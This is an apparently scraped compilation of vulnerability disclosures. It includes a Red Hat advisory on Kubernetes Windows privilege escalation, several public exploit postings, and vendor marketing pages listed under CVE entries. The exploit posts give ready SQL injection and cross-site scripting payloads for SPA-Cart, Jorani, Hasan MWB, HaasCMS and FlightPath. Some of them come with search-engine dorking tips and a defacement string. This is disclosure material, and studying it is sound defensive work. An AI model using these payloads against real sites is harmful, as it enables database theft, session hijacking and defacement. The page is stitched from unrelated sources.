The components for Red Hat OpenShift support for Windows Containers 7.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-3676: A vulnerability was found in Kubernetes. This flaw allows a user who can create pods on Windows nodes to escalate to admin privileges on those nodes.
* CVE-2023-3955: A vulnerability was found in Kubernetes. This flaw allows a user who can create pods on Windows nodes to escalate to admin privileges on those nodes.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-08-28

Updated:

2023-08-28

**RHSA-2023:4777 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Important: Red Hat OpenShift support for Windows Containers 7.1.1 security update

**Type/Severity**

Security Advisory: Important

**Topic**

The components for Red Hat OpenShift support for Windows Containers 7.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.  

Security Fix(es):  

*   kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation (CVE-2023-3676)
*   kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation (CVE-2023-3955)

For more details about the security issue(s), including the impact, CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat OpenShift Container Platform 4.12 for RHEL 8 x86\_64

**Fixes**

*   BZ - 2227126 - CVE-2023-3676 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation
*   BZ - 2227128 - CVE-2023-3955 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation

**x86\_64**

openshift4-wincw/windows-machine-config-operator-bundle@sha256:4c7a13c2c4e3bd3bf1827cd2182ac5c20587e4f214c62c7ff08cc3067433229f

openshift4-wincw/windows-machine-config-rhel8-operator@sha256:e3938425061488710618f093d94715a8ec9787135fb988a25d313a1642b4d1db

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4777: Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 7.1.1 security update

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4548# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /searchGET parameter 'filter[brandid]' is vulnerable to SQL Injectionhttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black---Parameter: filter[brandid] (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black---[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 SQL Injection

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4547# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /searchGET parameter 'filter[brandid]' is vulnerable to XSSGET parameter 'filter[price]' is vulnerable to XSShttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GBXSS Payloads:vnxjb"><script>alert(1)</script>bvu51[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 Cross Site Scripting

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Jorani 1.0.3 Cross Site Scripting

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

HaasCMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : HaasCMS v1.0 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://haasit.com/                                                                                                 |  | # Dork      : Website Design by Haas IT Solutions, Inc.                                                                          |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /printobit.php?id=437999999.9'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://target_site/printobit.php?id=437999999.9%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

HaasCMS 1.0 Cross Site Scripting

FlightPath LMS version 5.0-rc2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v5.0-rc2 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 5.0-rc2 Cross Site Scripting

A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.

Submitted by mayuri\_k on Sunday, July 30, 2023 - 15:55.

In today's competitive business landscape, efficient inventory management is essential for success. Managing stock levels, tracking sales, and ensuring seamless operations can be challenging without the right tools. Fortunately, there are Free and Open Source Inventory Management Systems available, coded in PHP, that can revolutionize the way you handle your inventory. In this article, we will explore the benefits of using such a system and provide you with access to the PHP source code, enabling you to optimize your inventory management and boost your business efficiency.

The Importance of an Inventory Management System

A well-designed Inventory Management System streamlines the entire inventory control process, providing numerous advantages for businesses, including:

\- Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.

\- Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.

\- Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.

\- Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.

The Benefits of Free and Open Source Inventory Management Systems

Choosing a Free and Open Source Inventory Management System has several advantages:

\- Cost-Effective Solution: Avoid expensive licensing fees and enjoy a cost-effective, customizable solution.

\- Flexibility and Customization: Modify the source code to fit your specific business needs and workflows.

\- Strong Community Support: Benefit from a thriving community of developers who actively contribute to the system's improvement and security.

\- Regular Updates: Enjoy regular updates and enhancements, ensuring your system stays up-to-date with the latest features and fixes.

Introducing the PHP Inventory Management System

Our recommended PHP Inventory Management System offers a user-friendly interface, robust features, and easy integration with your existing systems. Let's delve into some of its key features:

\- Product Management: Effortlessly add, edit, and categorize products, complete with descriptions, images, and stock levels.

\- Inventory Tracking: Monitor stock levels, set reorder points, and receive notifications when stocks are running low.

\- Sales and Order Management: Process orders efficiently, generate invoices, and manage sales records.

\- Reporting and Analytics: Generate insightful reports on sales, inventory levels, and profitability.

\- User Authentication and Access Control: Securely manage user accounts with role-based access.

How to Implement the Inventory Management System

To get started, download the free PHP Inventory Management System source code from the provided link. Ensure you have PHP installed on your local or server environment. Import the database and configure the system to fit your business requirements.

**Check here Installation steps :**

Incorporating a Free and Open Source Inventory Management System coded in PHP can transform the way you manage your inventory. By providing real-time stock visibility, accurate sales tracking, and efficient order management, your business will experience enhanced efficiency and cost savings. Embrace the power of open-source solutions, and with the access to the PHP source code, you can tailor the Inventory Management System to perfectly suit your business needs. Upgrade your inventory management today and propel your business to new heights of success!

**How to Run this Free and Open Source inventory management system php source code :**

1.  Download source code (zip file) of inventory management system project with SQL file.
2.  Extract the file of the project folder (zip file) related to the ample
3.  Copy project folder i.e source code files to htdocs
4.  open localhost/phpmyadmin and create a database (remember PHP version must be a minimum of 7.1)
5.  Now import the database of the SQL file
6.  Open source code files and check database name is proper or not.
7.  Now open the admin panel and log in with provided credentials.
    
    **I provide high-quality software projects, thesis writing services, website development services, and web application development. If there is any need you can contact me by email.**
    

*   5454 views

CVE-2023-39708: Free and Open Source inventory management system php source code

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.

Let clients suggest prices for your products and services using a simple make-an-offer button.

Version: 1.0

Embed a discrete make-an-offer app into your website and collect your clients' feedback on your pricing. You can either predefine three price options or give users the chance to propose their own price. Review the average offered price for each product or service and use it to adjust your pricing policy accordingly. Depending on the kind of offers made by your clients, you can choose to automatically ask for their email to start sending them your newsletter, or give them a promo code for the specific product, or just thank them.

**Make An Offer Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Give your customers the chance to negotiate prices and win promo codes for the products and services they suggest prices for. The Make An Offer Widget is a simple call-to-action app that will bring life to your website and help you adjust your pricing policy.

Price Suggestions

With the Make An Offer Widget, you can give your website visitors three price options to choose from or let them propose any price.

Diverse Color Themes

10 color themes are available for each make-an-offer button so that you can easily adapt them to your website design and branding.

Unlimited Offer Widgets

Create separate offer widgets for each product or service. There is no limit on the number of make-an-offer buttons you can create.

Email & SMS Notifications

Create autoresponder messages that will be sent via email or SMS to administrators when a new offer is received.

Three Price Scenarios

Each offer option (both fixed price and price percentage) can lead to a different action: send an email, promo code, or thank-you email.

Expand Your Client Database

Using the make-an-offer app and the emails it collects from your clients you can enrich your customer database.

Review Offers & Emails

See a list of all offers received and check visitors' IP addresses and emails, if available. Filter offers by type using quick tabs.

PHP Source Code Customization

Buy a Developer License and make custom changes to the source code. Or request us to modify the make-an-offer app for you.

SPECIAL OFFER

**Make An Offer Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Make An Offer Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Make An Offer Widget**

**Key Benefits**

Installation Support

Key Features

Customizations

Remote Hosting

High Performance

**Pricing**

You can buy the Make An Offer Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Make An Offer Widget and how the script has improved their online business.

“

PHPjabbers offers incredible PHP scripts that not only look good but are also enjoyable to set up and use. But what keeps me coming back to buy their latest scripts is the unbeatable customer service that you can't find anywhere else.

Andrew Jensen

“

Thank you, you guys are great. I am really impressed with your patience with me, as I am not an expert with codes and the way you come through for me. I am in services myself and I will like to thank you for an excellent service and support. I would recommend your products and your company to all my associates. Excellent service and support.  
Thank you again!

marios constantinou

“

I use Freeway (software) for web design, and learned of PHPJabbers on one of their forums where they received applause as offering easy to implement and well-supported PHP scripts. I totally agree.

Robert Hicks

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Make An Offer Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**STIVA Shopping Cart**

$49 / $89

**Callback Widget**

$19 / $29

**PHP Review Script**

$39 / $79

**PHP Poll Script**

$19 / $29

**Document Creator**

$19 / $39

**PHP Comment Script**

$19 / $39

CVE-2023-40752: Make An Offer Widget | PHPJabbers

A vulnerability was found in glb Meetup Tag Extension 0.1 on MediaWiki. It has been rated as problematic. This issue affects some unknown processing of the component Link Attribute Handler. The manipulation leads to use of web link to untrusted target with window.opener access. Upgrading to version 0.2 is able to address this issue. The identifier of the patch is 850c726d6bbfe0bf270801fbb92a30babea4155c. It is recommended to upgrade the affected component. The identifier VDB-238157 was assigned to this vulnerability.

Tag

#web